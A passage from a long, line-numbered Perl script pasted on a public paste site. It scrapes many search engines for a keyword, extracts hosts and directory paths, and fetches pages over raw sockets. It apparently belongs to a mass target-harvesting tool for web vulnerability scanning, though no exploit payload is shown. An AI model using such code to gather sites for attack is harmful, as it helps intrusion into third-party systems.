  6628.  
  6629. if ($1 !~ /google/){
  6630.  
  6631. my $k=$1;
  6632.  
  6633. my @grep=links($k);
  6634.  
  6635. push(@lst,@grep);
  6636.  
  6637. }}}
  6638.  
  6639. return @lst;
  6640.  
  6641. }
  6642.  
  6643.  
  6644.  
  6645. #####
  6646.  
  6647. # SUBS SEARCH
  6648.  
  6649. #####
  6650.  
  6651. sub search(){
  6652.  
  6653. my @lst;
  6654.  
  6655. my $key = $_[0];
  6656.  
  6657. for($b=0;$b<=1000;$b+=100){
  6658.  
  6659. my $ser=("http://www.search.com/search?q=".key($key)."".$b);
  6660.  
  6661. my $Res=query($ser);
  6662.  
  6663. while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  6664.  
  6665. if ($1 !~ /msn|live|google|yahoo/){
  6666.  
  6667. my $k=$1;
  6668.  
  6669. my @grep=links($k);
  6670.  
  6671. push(@lst,@grep);
  6672.  
  6673. }}}
  6674.  
  6675. return @lst;
  6676.  
  6677. }
  6678.  
  6679.  
  6680.  
  6681. #####
  6682.  
  6683. # SUBS FireBall
  6684.  
  6685. #####
  6686.  
  6687. sub fireball(){
  6688.  
  6689. my $key=$_[0];
  6690.  
  6691. my $inicio=1;
  6692.  
  6693. my $pagina=200;
  6694.  
  6695. my @lst;
  6696.  
  6697. my $av=0;
  6698.  
  6699. while($inicio <= $pagina){
  6700.  
  6701. my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8";
  6702.  
  6703. my $Res=query($fireball);
  6704.  
  6705. while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){
  6706.  
  6707. if ($1 !~ /msn|live|google|yahoo/){
  6708.  
  6709. my $k="$1/";
  6710.  
  6711. my @grep=links($k);
  6712.  
  6713. push(@lst,@grep);
  6714.  
  6715. }}
  6716.  
  6717. $av=$av+10;
  6718.  
  6719. $inicio++;
  6720.  
  6721. }
  6722.  
  6723. return @lst;
  6724.  
  6725. }
  6726.  
  6727. #####
  6728.  
  6729. # SUBS UOL
  6730.  
  6731. #####
  6732.  
  6733. sub uol(){
  6734.  
  6735. my @lst;
  6736.  
  6737. my $key = $_[0];
  6738.  
  6739. for($b=1;$b<=1000;$b+=10){
  6740.  
  6741. my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
  6742.  
  6743. my $Res=query($UoL);
  6744.  
  6745. while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
  6746.  
  6747. my $k=$1;
  6748.  
  6749. if($k!~/busca|uol|yahoo/){
  6750.  
  6751. my $k=$1;
  6752.  
  6753. my @grep=links($k);
  6754.  
  6755. push(@lst,@grep);
  6756.  
  6757. }}}
  6758.  
  6759. return @lst;
  6760.  
  6761. }
  6762.  
  6763.  
  6764.  
  6765. #####
  6766.  
  6767. # Altavista
  6768.  
  6769. #####
  6770.  
  6771. sub altavista(){
  6772.  
  6773. my @lst;
  6774.  
  6775. my $key = $_[0];
  6776.  
  6777. for($b=1;$b<=1000;$b+=10){
  6778.  
  6779. my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
  6780.  
  6781. my $Res=query($AlT);
  6782.  
  6783. while($Res=~m/<span class=ngrn>(.+?)\//g){
  6784.  
  6785. if($1 !~ /altavista/){
  6786.  
  6787. my $k=$1;
  6788.  
  6789. $k=~s/<//g;
  6790.  
  6791. $k=~s/ //g;
  6792.  
  6793. my @grep=links($k);
  6794.  
  6795. push(@lst,@grep);
  6796.  
  6797. }}}
  6798.  
  6799. return @lst;
  6800.  
  6801. }
  6802.  
  6803.  
  6804.  
  6805. sub altavistade(){
  6806.  
  6807. my @lst;
  6808.  
  6809. my $key = $_[0];
  6810.  
  6811. for($b=1;$b<=1000;$b+=10){
  6812.  
  6813. my $AlT=("http://de.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
  6814.  
  6815. my $Res=query($AlT);
  6816.  
  6817. while($Res=~m/<span class=ngrn>(.+?)\//g){
  6818.  
  6819. if($1 !~ /altavista/){
  6820.  
  6821. my $k=$1;
  6822.  
  6823. $k=~s/<//g;
  6824.  
  6825. $k=~s/ //g;
  6826.  
  6827. my @grep=links($k);
  6828.  
  6829. push(@lst,@grep);
  6830.  
  6831. }}}
  6832.  
  6833. return @lst;
  6834.  
  6835. }
  6836.  
  6837.  
  6838.  
  6839. sub altavistaus(){
  6840.  
  6841. my @lst;
  6842.  
  6843. my $key = $_[0];
  6844.  
  6845. for($b=1;$b<=1000;$b+=10){
  6846.  
  6847. my $AlT=("http://us.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
  6848.  
  6849. my $Res=query($AlT);
  6850.  
  6851. while($Res=~m/<span class=ngrn>(.+?)\//g){
  6852.  
  6853. if($1 !~ /altavista/){
  6854.  
  6855. my $k=$1;
  6856.  
  6857. $k=~s/<//g;
  6858.  
  6859. $k=~s/ //g;
  6860.  
  6861. my @grep=links($k);
  6862.  
  6863. push(@lst,@grep);
  6864.  
  6865. }}}
  6866.  
  6867. return @lst;
  6868.  
  6869. }
  6870.  
  6871.  
  6872.  
  6873. #####
  6874.  
  6875. # HotBot
  6876.  
  6877. #####
  6878.  
  6879. sub hotbot(){
  6880.  
  6881. my @lst;
  6882.  
  6883. my $key = $_[0];
  6884.  
  6885. for($b=0;$b<=1000;$b+=100){
  6886.  
  6887. my $hot=("http://search.hotbot.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b);
  6888.  
  6889. my $Res=query($hot);
  6890.  
  6891. while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  6892.  
  6893. if ($1 !~ /msn|live|google|yahoo/){
  6894.  
  6895. my $k=$1;
  6896.  
  6897. my @grep=links($k);
  6898.  
  6899. push(@lst,@grep);
  6900.  
  6901. }}}
  6902.  
  6903. return @lst;
  6904.  
  6905. }
  6906.  
  6907.  
  6908.  
  6909.  
  6910.  
  6911. #####
  6912.  
  6913. # Mamma
  6914.  
  6915. #####
  6916.  
  6917. sub mamma(){
  6918.  
  6919. my @lst;
  6920.  
  6921. my $key = $_[0];
  6922.  
  6923. for($b=0;$b<=1000;$b+=100){
  6924.  
  6925. my $mam=("http://www.mamma.com/Mamma?utfout=$av&qtype=0&query=".key($key)."".$b);
  6926.  
  6927. my $Res=query($mam);
  6928.  
  6929. while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  6930.  
  6931. if ($1 !~ /msn|live|google|yahoo/){
  6932.  
  6933. my $k=$1;
  6934.  
  6935. my @grep=links($k);
  6936.  
  6937. push(@lst,@grep);
  6938.  
  6939. }}}
  6940.  
  6941. return @lst;
  6942.  
  6943. }
  6944.  
  6945.  
  6946.  
  6947. #####
  6948.  
  6949. # MozBot
  6950.  
  6951. #####
  6952.  
  6953. sub mozbot()
  6954.  
  6955. {
  6956.  
  6957. my @lst;
  6958.  
  6959. my $key=$_[0];
  6960.  
  6961. my $i=0;
  6962.  
  6963. my $pg=0;
  6964.  
  6965. for($i=0; $i<=100; $i+=1){
  6966.  
  6967. my $mozbot=("http://www.mozbot.fr/search?q=".key($key)."&st=int&page=".$i);
  6968.  
  6969. my $Res=query($mozbot);
  6970.  
  6971. while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){
  6972.  
  6973. my $k=$1;
  6974.  
  6975. $k=~s/ //g;
  6976.  
  6977. my @grep=links($k);
  6978.  
  6979. push(@lst,@grep);
  6980.  
  6981. }}
  6982.  
  6983. return @lst;
  6984.  
  6985. }
  6986.  
  6987.  
  6988.  
  6989. sub links()
  6990.  
  6991. {
  6992.  
  6993. my @l;
  6994.  
  6995. my $link=$_[0];
  6996.  
  6997. my $host=$_[0];
  6998.  
  6999. my $hdir=$_[0];
  7000.  
  7001. $hdir=~s/(.*)\/[^\/]*$/\1/;
  7002.  
  7003. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  7004.  
  7005. $host.="/";
  7006.  
  7007. $link.="/";
  7008.  
  7009. $hdir.="/";
  7010.  
  7011. $host=~s/\/\//\//g;
  7012.  
  7013. $hdir=~s/\/\//\//g;
  7014.  
  7015. $link=~s/\/\//\//g;
  7016.  
  7017. push(@l,$link,$host,$hdir);
  7018.  
  7019. return @l;
  7020.  
  7021. }
  7022.  
  7023.  
  7024.  
  7025. sub geths(){
  7026.  
  7027. my $host=$_[0];
  7028.  
  7029. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  7030.  
  7031. return $host;
  7032.  
  7033. }
  7034.  
  7035.  
  7036.  
  7037. sub key(){
  7038.  
  7039. my $chiave=$_[0];
  7040.  
  7041. $chiave =~ s/ /\+/g;
  7042.  
  7043. $chiave =~ s/:/\%3A/g;
  7044.  
  7045. $chiave =~ s/\//\%2F/g;
  7046.  
  7047. $chiave =~ s/&/\%26/g;
  7048.  
  7049. $chiave =~ s/\"/\%22/g;
  7050.  
  7051. $chiave =~ s/,/\%2C/g;
  7052.  
  7053. $chiave =~ s/\\/\%5C/g;
  7054.  
  7055. return $chiave;
  7056.  
  7057. }
  7058.  
  7059.  
  7060.  
  7061. sub query($){
  7062.  
  7063. my $url=$_[0];
  7064.  
  7065. $url=~s/http:\/\///;
  7066.  
  7067. my $host=$url;
  7068.  
  7069. my $query=$url;
  7070.  
  7071. my $page="";
  7072.  
  7073. $host=~s/href=\"?http:\/\///;
  7074.  
  7075. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  7076.  
  7077. $query=~s/$host//;
  7078.  
  7079. if ($query eq "") {$query="/";};
  7080.  
  7081. eval {
  7082.  
  7083. my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  7084.  
  7085. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  7086.  
  7087. my @r = <$sock>;
  7088.  
  7089. $page="@r";
  7090.  
  7091. close($sock);
  7092.  
  7093. };
  7094.  
  7095. return $page;
  7096.  
  7097. }
  7098.  
  7099.  
  7100.  
  7101. sub unici{
  7102.  
  7103. my @unici = ();
  7104.  
  7105. my %visti = ();
  7106.  
  7107. foreach my $elemento ( @_ )
  7108.  
  7109. {
  7110.  
  7111. next if $visti{ $elemento }++;
  7112.  
  7113. push @unici, $elemento;
  7114.  
  7115. }
  7116.  
  7117. return @unici;
  7118.  
  7119. }
  7120.  
  7121.  
  7122.  
  7123. sub http_query($){
  7124.  
  7125. my ($url) = @_;
  7126.  
  7127. my $host=$url;
  7128.  
  7129. my $query=$url;
  7130.  
  7131. my $page="";
  7132.  
  7133. $host =~ s/href=\"?http:\/\///;
  7134.  
  7135. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  7136.  
  7137. $query =~s/$host//;
  7138.  
  7139. if ($query eq "") {$query="/";};
  7140.  
  7141. eval {
  7142.  
  7143. local $SIG{ALRM} = sub { die "1";};
  7144.  
  7145. alarm 10;
  7146.  
  7147. my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  7148.  
  7149. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  7150.  
  7151. my @r = <$sock>;
  7152.  
  7153. $page="@r";
  7154.  
  7155. alarm 0;
  7156.  
  7157. close($sock);
  7158.  
  7159. };
  7160.  
  7161. return $page;
  7162.  
  7163. }}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement